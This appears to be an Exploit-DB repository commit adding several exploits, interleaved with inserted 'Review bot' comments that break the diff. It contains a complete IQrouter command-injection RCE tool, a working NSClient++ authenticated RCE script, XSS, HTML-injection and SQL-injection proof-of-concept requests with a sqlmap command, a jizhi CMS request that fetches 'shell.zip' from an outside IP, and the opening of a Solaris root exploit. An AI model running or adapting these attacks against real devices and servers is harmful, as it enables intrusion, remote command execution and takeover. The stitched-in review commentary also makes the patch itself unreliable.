From 1c5c38825dbf284207635c6a8398c5e8b8bae2cf Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 22 Apr 2020 05:01:47 +0000 Subject: [PATCH] DB: 2020-04-22 10 changes to exploits/shellcodes Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation WordPress 2.0.2 - 'cache' Remote Shell Injection Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption WordPress Core 2.0.2 - 'cache' Remote Shell Injection CSZ CMS 1.2.7 - Persistent Cross-Site Scripting PMB 5.6 - 'logid' SQL Injection CSZ CMS 1.2.7 - 'title' HTML Injection IQrouter 3.3.1 Firmware - Remote Code Execution NSClient++ 0.5.2.35 - Authenticated Remote Code Execution jizhi CMS 1.6.7 - Arbitrary File Download P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) --- exploits/hardware/webapps/48358.py | 339 ++++++++++++++++++++++++++++ exploits/hardware/webapps/48362.txt | 90 ++++++++ exploits/json/webapps/48360.txt | 192 ++++++++++++++++ exploits/php/webapps/48354.txt | 32 +++ exploits/php/webapps/48356.txt | 43 ++++ exploits/php/webapps/48357.txt | 27 +++ exploits/php/webapps/48361.txt | 46 ++++ exploits/solaris/local/48359.c | 320 ++++++++++++++++++++++++++ exploits/windows/remote/48363.py | 241 ++++++++++++++++++++ files_exploits.csv | 11 +- files_shellcodes.csv | 1 + shellcodes/windows/48355.c | 285 +++++++++++++++++++++++ 12 files changed, 1626 insertions(+), 1 deletion(-) create mode 100755 exploits/hardware/webapps/48358.py create mode 100644 exploits/hardware/webapps/48362.txt create mode 100644 exploits/json/webapps/48360.txt create mode 100644 exploits/php/webapps/48354.txt create mode 100644 exploits/php/webapps/48356.txt create mode 100644 exploits/php/webapps/48357.txt create mode 100644 exploits/php/webapps/48361.txt create mode 100644 exploits/solaris/local/48359.c create mode 100755 exploits/windows/remote/48363.py create mode 100644 shellcodes/windows/48355.c 
diff --git a/exploits/hardware/webapps/48358.py b/exploits/hardware/webapps/48358.py
new file mode 100755
index 000000000..dc5fb38ab
--- /dev/null
+++ b/exploits/hardware/webapps/48358.py
@@ -0,0 +1,339 @@ +# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution +# Date: 2020-04-21 +# Exploit Author: drakylar +# Vendor Homepage: https://evenroute.com/ +# Software Link: https://evenroute.com/iqrouter +# Version: IQrouter firmware up to 3.3.1 +# Tested on: IQrouter firmware 3.3.1 +# CVE : N/A + +#!/usr/bin/env python3 +import argparse +from sys import argv, exit + +try: + import requests +except ImportError: + print("Install requests lib! pip3 install requests") + + +print(""" +####################################################################### +# IQrouter multiple RCE and other vulnerabilities # +# by drakylar (Shaposhnikov Ilya) # +# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 # +# CVE-2020-11967 CVE-2020-11968 # +####################################################################### +""") + + +rce_setup = [ + [ + "/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'", + "RCE /vlanTag (vlan_tag param)" + ], + [ + "/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'", + "RCE /verify_wifi (wifi_conflict param). 
Need hide_wifi_config != true" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2", + "RCE /screen9 (s2 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2", + "RCE /screen9 (s1 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'", + "RCE /screen9 (p2 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2", + "RCE /screen9 (p1 param)" + ], + [ + "/cgi-bin/luci/er/screen4?save_isp='`{}`", + "RCE /screen4 (save_isp param)" + ], + [ + "/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'", + "RCE /screen2 set_wan_modem_interfaces param)" + ], + [ + "/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'", + "RCE /screen2 find_ip_address_conflict param)" + ], + [ + "/cgi-bin/luci/er/screen10?set_security_question='`{}`'", + "RCE /screen10 (set_security_question param)" + ], + [ + "/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1", + "RCE /screen10 (set_security_answer param)"], + [ + "/cgi-bin/luci/er/screen1?zonename='`{}`'", + "RCE /screen1 (zonename param)" + ], + [ + "/cgi-bin/luci/er/register?email=`{}`", + "RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)" + ] +] + +rce_any = [ + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1", + "RCE /wifi (s2 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7", + "RCE /wifi (s1 param)" + ], + [ + 
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'", + "RCE /wifi (p2 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4", + "RCE /wifi (p1 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guestwifi_5g_ssid param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guestwifi_2g_ssid param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guest_key param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7", + "RCE /wifi (enable_guestwifi param)" + ], + [ + "/cgi-bin/luci/er/screen11.1?email=`{}`®ister=123&uilog=123&bg=123", + "RCE /screen11.1 (email param)" + ], + [ + "/cgi-bin/luci/er/reboot_link?link='`{}`'", + "RCE /reboot_link (link param)" + ], + [ + 
"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/", + "RCE /diag_wifi (htm5ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/", + "RCE /diag_wifi (htm2ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/", + "RCE /diag_wifi (c5ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/", + "RCE /diag_wifi (c2ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/", + "RCE /diag_set_static_wan (static_ip param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/", + "RCE /diag_set_static_wan (net_mask param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/", + "RCE /diag_set_static_wan (gateway param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/", + "RCE /diag_set_static_wan (dns param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/", + "RCE /diag_set_static_modem (static_ip param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/", + "RCE /diag_set_static_modem (net_mask param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/", + "RCE /diag_set_static_modem (gateway param)" + ], + [ + "/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/", + "RCE /diag_set_device_name_and_sync (device_name param)" + ], + [ + "/cgi-bin/luci/er/diag_set_device_name/'`{}`'/", + "RCE /diag_set_device_name (device_name param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/", + "RCE /diag_pppoe_update (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/", + "RCE /diag_pppoe_update (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/", + "RCE /diag_pppoe (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/", + "RCE /diag_pppoe (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/", + "RCE /diag_pppoa_update (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/", + "RCE 
/diag_pppoa_update (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/", + "RCE /diag_pppoa (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/", + "RCE /diag_pppoa (wan_password param)" + ], + [ + "/cgi-bin/luci/er/advanced_link?link='`{}`'", + "RCE /advanced_link (link param)" + ] + +] + +advanced_payloads = [ + [ + "/cgi-bin/luci/er/reboot_link?reboot=1", + "Reboot IQrouter (/reboot_link reboot param))" + ], + [ + "/cgi-bin/luci/er/screen2?reboot=1", + "Reboot IQrouter (/screen2 reboot param))" + ], + [ + "/cgi-bin/luci/er/index?reset_config=1", + "Reset IQrouter (/index reset_config param)" + ], + [ + "/cgi-bin/luci/er/screen7?upgrade=1", + "Upgrade IQrouter (/screen7 upgrade param)" + ], + [ + "/cgi-bin/luci/er/vlanTag?restart_network=1", + "Restart network (/vlanTag restart_network param)" + ], + [ + "/cgi-bin/luci/er/diag_iperf_cmd/start", + "Start iperf script (/diag_iperf_cmd/start)" + ], + [ + "/cgi-bin/luci/er/diag_iperf_cmd/stop", + "Stop iperf script (/diag_iperf_cmd/stop)" + ], + [ + "/cgi-bin/luci/er/get_syslog", + "Router setup info log (/get_syslog)" + ], + [ + "/cgi-bin/luci/er/diag_set_password/c00lpasswd/", + "Change root password to c00lpasswd (can change in code)" + ], + [ + "/cgi-bin/luci/er/reset_password/", + "Change root password to 'changeme' (static)" + ] +] + + +def print_payloads(): + print('#' * 30) + print("Payloads list") + num = 1 + print('######################### RCE without auth ########################') + for payload in rce_any: + print("{} - {}".format(num, payload[1])) + num += 1 + + print( + '############### RCE (router need to be in setup mode) ###############') + for payload in rce_setup: + print("{} - {}".format(num, payload[1])) + num += 1 + + print( + '######################### Advanced payloads #########################') + for payload in advanced_payloads: + print("{} - {}".format(num, payload[1])) + num += 1 + + +parser = argparse.ArgumentParser(description="IQrouter 
multiple RCE") +parser.add_argument('--host', help='Host', type=str) +parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int) +parser.add_argument('-n', '--num', help='Payload number', + default=0, type=int) +parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)', + default="pwd", type=str) +parser.add_argument('--protocol', help='Protocol (http/https)', + default="http", type=str) + +args = parser.parse_args() + + +def main(): + print("") + full_payload_list = rce_setup + rce_any + advanced_payloads + payloads_amount = len(full_payload_list) + try: + hostname = args.host + port = args.port + payload_num = int(args.num) + bash_cmd = args.cmd + protocol = args.protocol + + if payload_num < 1 or payload_num > payloads_amount: + print("Error with payload number!") + raise IndexError + if port < 0 or port > 65535: + print("Error with port number") + raise IndexError + if protocol not in ['http', 'https']: + print("Error with protocol name") + raise IndexError + + current_payload = full_payload_list[payload_num - 1] + print("Payload: {}".format(current_payload[1])) + print("Host: {}".format(hostname)) + print("Port: {}".format(port)) + print("Protocol: {}".format(protocol)) + print("Command: {}".format(bash_cmd)) + + full_url = "{}://{}:{}{}".format(protocol, hostname, port, + current_payload[0].format(bash_cmd)) + print("Built URL: {}".format(full_url)) + + r = requests.get(full_url) + print("Status code: {}".format(r.status_code)) + return + except IndexError: + parser.print_help() + print_payloads() + exit(1) + + +if __name__ == '__main__': + print( + "\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.") + exit(main()) \ No newline at end of file diff --git a/exploits/hardware/webapps/48362.txt b/exploits/hardware/webapps/48362.txt new file mode 100644 index 000000000..671415866 --- /dev/null +++ b/exploits/hardware/webapps/48362.txt 
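Review bot: The Exploit-DB header at the top of the file says `# CVE : N/A`, but the banner printed a few lines below lists CVE-2020-11963, CVE-2020-11964, CVE-2020-11966, CVE-2020-11967 and CVE-2020-11968; the header should carry those ids (`# CVE : CVE-2020-11963, CVE-2020-11964, CVE-2020-11966, CVE-2020-11967, CVE-2020-11968`) so the entry is found when the archive is indexed by CVE. The `except ImportError` branch only prints its message and falls through, so a missing `requests` module surfaces later as a NameError at the `requests.get(full_url)` call instead of as that message; an `exit(1)` after the print would make the failure explicit. The `#!/usr/bin/env python3` shebang sits after the header comments, where it has no effect.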
@@ -0,0 +1,90 @@ +# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin) +# Google Dork:jizhicms +# Date: 2020-04-18 +# Exploit Author: iej1ctk1g +# Product web page: https://www.p5.hu +# Affected version: 1.0.20, 1.0.11 +# CVE : N/A + + + + + + + +
+ + + + + + + +
+ + + + + + +
+ + + + +
+ + + + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/json/webapps/48360.txt b/exploits/json/webapps/48360.txt new file mode 100644 index 000000000..93eebe24e --- /dev/null +++ b/exploits/json/webapps/48360.txt 
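Review bot: The `# Google Dork:jizhicms` line does not belong to this P5 FNIP entry — it matches the jizhi CMS advisory 48361.txt from the same author in this commit — and should read `# Google Dork: N/A` or be dropped. The header lists `Affected version: 1.0.20, 1.0.11` while the title names only 1.0.20; one of the two should be aligned with the other. The PoC body (the rest of the 90-line hunk) is not legible in this rendering, so the request it documents cannot be reviewed here.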
@@ -0,0 +1,192 @@ +# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution +# Google Dork: N/A +# Date: 2020-04-20 +# Exploit Author: kindredsec +# Vendor Homepage: https://nsclient.org/ +# Software Link: https://nsclient.org/download/ +# Version: 0.5.2.35 +# Tested on: Microsoft Windows 10 Pro (x64) +# CVE: N/A +# +# NSClient++ is a monitoring agent that has the option to run external scripts. +# This feature can allow an attacker, given they have credentials, the ability to execute +# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt +# Default, this leads to privileged code execution. + +#!/usr/bin/env python3 + +import requests +from bs4 import BeautifulSoup as bs +import urllib3 +import json +import sys +import random +import string +import time +import argparse +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def generateName(): + + letters = string.ascii_lowercase + string.ascii_uppercase + return ''.join(random.choice(letters) for i in range(random.randint(8,13))) + +def printStatus(message, msg_type): + + C_YELLOW = '\033[1;33m' + C_RESET = '\033[0m' + C_GREEN = '\033[1;32m' + C_RED = '\033[1;31m' + + if msg_type == "good": + green_plus = C_GREEN + "[+]" + C_RESET + string = green_plus + " " + message + + elif msg_type == "info": + yellow_ex = C_YELLOW + "[!]" + C_RESET + string = yellow_ex + " " + message + + elif msg_type == "bad": + red_minus = C_RED + "[-]" + C_RESET + string = red_minus + " " + message + + print(string) + + +# This function adds a new external script containing the desired +# command, then saves the configuration +def configurePayload(session, cmd, key): + + printStatus("Configuring Script with Specified Payload . . 
.", "info") + endpoint = "/settings/query.json" + node = { "path" : "/settings/external scripts/scripts", + "key" : key } + value = { "string_data" : cmd } + update = { "node" : node , "value" : value } + payload = [ { "plugin_id" : "1234", + "update" : update } ] + json_data = { "type" : "SettingsRequestMessage", "payload" : payload } + + out = session.post(url = base_url + endpoint, json=json_data, verify=False) + if "STATUS_OK" not in str(out.content): + printStatus("Error configuring payload. Hit error at: " + endpoint, "bad") + sys.exit(1) + + printStatus("Added External Script (name: " + key + ")", "good") + time.sleep(3) + printStatus("Saving Configuration . . .", "info") + header = { "version" : "1" } + payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ] + json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload } + + session.post(url = base_url + endpoint, json=json_data, verify=False) + + +# Since the application needs to be restarted after making changes, +# this function reloads the application, and waits for it to come back. +def reloadConfig(session): + + printStatus("Reloading Application . . .", "info") + endpoint = "/core/reload" + session.get(url = base_url + endpoint, verify=False) + + # Wait until the application successfully reloads by making a request + # every 10 seconds until it responds. + printStatus("Waiting for Application to reload . . .", "info") + time.sleep(10) + response = False + count = 0 + while not response: + try: + out = session.get(url = base_url, verify=False, timeout=10) + if len(out.content) > 0: + response = True + except: + count += 1 + if count > 10: + printStatus("Application failed to reload. Nice DoS exploit! /s", "bad") + sys.exit(1) + else: + continue + + +# This function makes the call to the new external script to +# ultimately execute the code. +def triggerPayload(session, key): + + printStatus("Triggering payload, should execute shortly . . 
.", "info") + endpoint = "/query/" + key + try: + session.get(url = base_url + endpoint, verify=False, timeout=10) + except requests.exceptions.ReadTimeout: + printStatus("Timeout exceeded. Assuming your payload executed . . .", "info") + sys.exit(0) + + +# Before setting up the exploit, this function makes sure the +# required feature (External Scripts) is enabled on the application. +def enableFeature(session): + + printStatus("Enabling External Scripts Module . . .", "info") + endpoint = "/registry/control/module/load" + params = { "name" : "CheckExternalScripts" } + out = session.get(url = base_url + endpoint, params=params, verify=False) + if "STATUS_OK" not in str(out.content): + printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad") + sys.exit(1) + + +# This function obtains an authentication token that gets added to all +# remaining headers. +def getAuthToken(session): + + printStatus("Obtaining Authentication Token . . .", "info") + endpoint = "/auth/token" + params = { "password" : password } + auth = session.get(url = base_url + endpoint, params=params, verify=False) + if "auth token" in str(auth.content): + j = json.loads(auth.content) + authToken = j["auth token"] + printStatus("Got auth token: " + authToken, "good") + return authToken + else: + printStatus("Error obtaining auth token, is your password correct? 
Hit error at: " + endpoint, "bad") + sys.exit(1) + + + +parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE") +parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.') +parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.') +parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.') +parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target') +args = parser.parse_args() + +if len(sys.argv) < 4: + parser.print_help() + sys.exit(1) + +# Build base URL, grab needed arguments +base_url = "https://" + args.t + ":" + args.P +printStatus("Targeting base URL " + base_url, "info") +password = args.p +cmd = args.c + +# Get first auth token, and add it to headers of session +s = requests.session() +token = getAuthToken(s) +s.headers.update({ "TOKEN" : token}) + +# Generate a random name, enable the feature, add the payload, +# then reload. +randKey = generateName() +enableFeature(s) +configurePayload(s, cmd, randKey) +reloadConfig(s) + +# Since application was reloaded, need a new auth token. +token = getAuthToken(s) +s.headers.update({ "TOKEN" : token}) + +# Execute our code. +triggerPayload(s, randKey) \ No newline at end of file diff --git a/exploits/php/webapps/48354.txt b/exploits/php/webapps/48354.txt new file mode 100644 index 000000000..c97757266 --- /dev/null +++ b/exploits/php/webapps/48354.txt 
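Review bot: configurePayload() writes a new entry under `/settings/external scripts/scripts` and then issues the `SAVE` control, and nothing in the script removes that entry afterwards, which the header does not mention; a line such as `# Note: the added external-script entry persists in the saved NSClient++ configuration` would tell users and responders what is left on the host. `from bs4 import BeautifulSoup as bs` is never used and adds a dependency the script does not need. In the header comment, `bt Default` should read `by default`.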
@@ -0,0 +1,32 @@ +# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting +# Exploit Author: Metin Yunus Kandemir +# Vendor Homepage: https://www.cszcms.com/ +# Software Link: https://sourceforge.net/projects/cszcms/ +# Version: v1.2.7 +# Description: +# Unauthorized user that has access private message can embed Javascript +# code to admin panel. + +# Steps to reproduce: +1- Log in to member panel. +1- Change user-agent header as +2- Send the private message to admin user. +3- When admin user logs in to Backend System Dashboard, an alert box pops +up on screen. + +PoC Request: + +POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1 +Host: localhost +User-Agent: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/CSZCMS-V1.2.7/member/newpm +Content-Type: application/x-www-form-urlencoded +Content-Length: 152 +Cookie: cszcookie +Connection: close +Upgrade-Insecure-Requests: 1 + +csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send \ No newline at end of file diff --git a/exploits/php/webapps/48356.txt b/exploits/php/webapps/48356.txt new file mode 100644 index 000000000..fce82ae1b --- /dev/null +++ b/exploits/php/webapps/48356.txt 
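Review bot: The reproduction steps label the first two steps both `1-` (`1- Log in to member panel.` and `1- Change user-agent header as`), so the list reads 1, 1, 2, 3; renumbering them 1 to 4 fixes it. The value that follows `Change user-agent header as` and the `User-Agent:` header in the PoC request are blank in this rendering, so the injected value cannot be checked here. The header also lacks the `# Date:` line the other entries in this commit carry.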
@@ -0,0 +1,43 @@ +# Exploit Title: PMB 5.6 - 'logid' SQL Injection +# Google Dork: inurl:opac_css +# Date: 2020-04-20 +# Exploit Author: 41-trk (Tarik Bakir) +# Vendor Homepage: http://www.sigb.net +# Software Link: http://forge.sigb.net/redmine/projects/pmb/files +# Affected versions : <= 5.6 + +-==== Software Description ====- + +PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. +We are some librarians, users and developers deploring this state of affairs. + +PMB is based on web technology. This is what we sometimes call a 'web-app'. +PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language. + +The main functions of PMB are : + + * Supporting the UNIMARC format + * Authorities management (authors, publishers, series, subjects...) + * Management of loans, holds, borrowers... + * A user-friendly configuration + * The ability to import full bibliographic records + * A user-friendly OPAC integrating a browser + * Loans management with a module designed to serve even the very small establishments + * Serials management + * Simple administration procedures that can be handled easily even by the library staff... + +-==== Vulnerability ====- + +Variable $logid isn't properly sanitized in file /admin/sauvegarde/download.php, which allows ADMINISTRATION_AUTH to execute arbitrary SQL commands via the id parameter. + +-==== POC ====- + +http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1 [SQLI] + +Using SQLMAP : + +./sqlmap.py -u "http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1" -p logid --headers="Cookie: [VALID_USER_COOKIE]" --passwords + +-==== Exploit requirements ====- + +- You will need to be logged in in order to exploit the vulnerability. \ No newline at end of file 
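Review bot: The vulnerability paragraph says the injection is reachable `via the id parameter`, while the title, the PoC URL and the sqlmap line all name `logid`; the sentence should read `via the logid parameter`. `ADMINISTRATION_AUTH` is presumably PMB's own permission name; a short gloss such as `(users holding PMB's administration right)` would make the precondition clear to readers unfamiliar with PMB.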
diff --git a/exploits/php/webapps/48357.txt b/exploits/php/webapps/48357.txt new file mode 100644 index 000000000..1b33d4bfa --- /dev/null +++ b/exploits/php/webapps/48357.txt @@ -0,0 +1,27 @@ +# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection +# Exploit Author: Metin Yunus Kandemir +# Vendor Homepage: https://www.cszcms.com/ +# Software Link: https://sourceforge.net/projects/cszcms/ +# Version: v1.2.7 +# Description: +# Authenticated user can inject hyperlink to Backend System Dashboard and +# Member Dashboard via message. + +PoC Request: + +POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/CSZCMS-V1.2.7/member/newpm +Content-Type: application/x-www-form-urlencoded +Content-Length: 196 +Cookie: cszcookie +Connection: close +Upgrade-Insecure-Requests: 1 + +csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=

Please +click to view

&message=phishing&submit=Send \ No newline at end of file diff --git a/exploits/php/webapps/48361.txt b/exploits/php/webapps/48361.txt new file mode 100644 index 000000000..111f38335 --- /dev/null +++ b/exploits/php/webapps/48361.txt @@ -0,0 +1,46 @@ +# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download +# Google Dork: jizhicms +# Date: 2020-04-18 +# Exploit Author: iej1ctk1g +# Vendor Homepage: https://www.jizhicms.cn/ +# Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip +# Version: 1.6.7 +# Tested on: Mac OS +# CVE : N/A + +Data 1. + +POST /admin.php/Plugins/update.html HTTP/1.1 +Host: 192.168.1.253:8888 +Content-Length: 86 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://192.168.1.253:8888 +Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09 +Connection: close + +action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip + + +Data 2. + +POST /admin.php/Plugins/update.html HTTP/1.1 +Host: 192.168.1.253:8888 +Content-Length: 32 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://192.168.1.253:8888 +Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09 +Connection: close + +action=file-upzip&filepath=shell \ No newline at end of file 
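Review bot: The value that follows `title=` in the PoC request is only partly legible in this rendering (`Please click to view` survives), so the exact markup submitted cannot be verified here; the entry would be clearer with a line stating the field involved, e.g. `# Injection point: the 'title' field of /member/insertpm/`. The header lacks the `# Date:` line the other entries in this commit carry.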
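Review bot: The first request's `download_url` points at a concrete third-party host, `http://39.105.143.130:9090/shell.zip`, together with a real-looking `PHPSESSID` value; a published PoC should not direct readers at an address nobody controls, so the URL should be replaced with a placeholder such as `http://<YOUR_HOST>/shell.zip` and the cookie with `PHPSESSID=<SESSION>`. `Tested on: Mac OS` describes the client rather than the server the CMS ran on; naming the server stack would be more useful to anyone reproducing the issue.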
diff --git a/exploits/solaris/local/48359.c b/exploits/solaris/local/48359.c
new file mode 100644
index 000000000..1895c1312
--- /dev/null
+++ b/exploits/solaris/local/48359.c
@@ -0,0 +1,320 @@ +# Title: Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation +# Date: 2020-04-21 +# Author: Marco Ivaldi +# Vendor: www.oracle.com +# CVE: CVE-2020-2944 + +/* + * raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel + * Copyright (c) 2019-2020 Marco Ivaldi + * + * A buffer overflow in the _SanityCheck() function in the Common Desktop + * Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and + * earlier allows local users to gain root privileges via a long calendar name + * or calendar owner passed to sdtcm_convert in a malicious calendar file + * (CVE-2020-2944). + * + * The open source version of CDE (based on the CDE 2.x codebase) is not + * affected, because it does not ship the vulnerable binary. + * + * "CDE, the gift that keeps on giving" -- @0xdea + * "Feels more like a curse you can't break from this side." -- @alanc + * + * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack + * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory + * space, try returning to sprintf() instead of strcpy(). + * + * I haven't written a Solaris/SPARC version because I don't have a SPARC box + * on which Solaris 10 can run. If anybody is kind enough to give me access to + * such a box, I'd be happy to port my exploit to Solaris/SPARC as well. + * + * Usage: + * $ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall + * $ ./raptor_sdtcm_conv + * [...] + * Do you want to correct it? (Y/N) [Y] n + * # id + * uid=0(root) gid=1(other) egid=12(daemon) + * # + * + * This should work with any 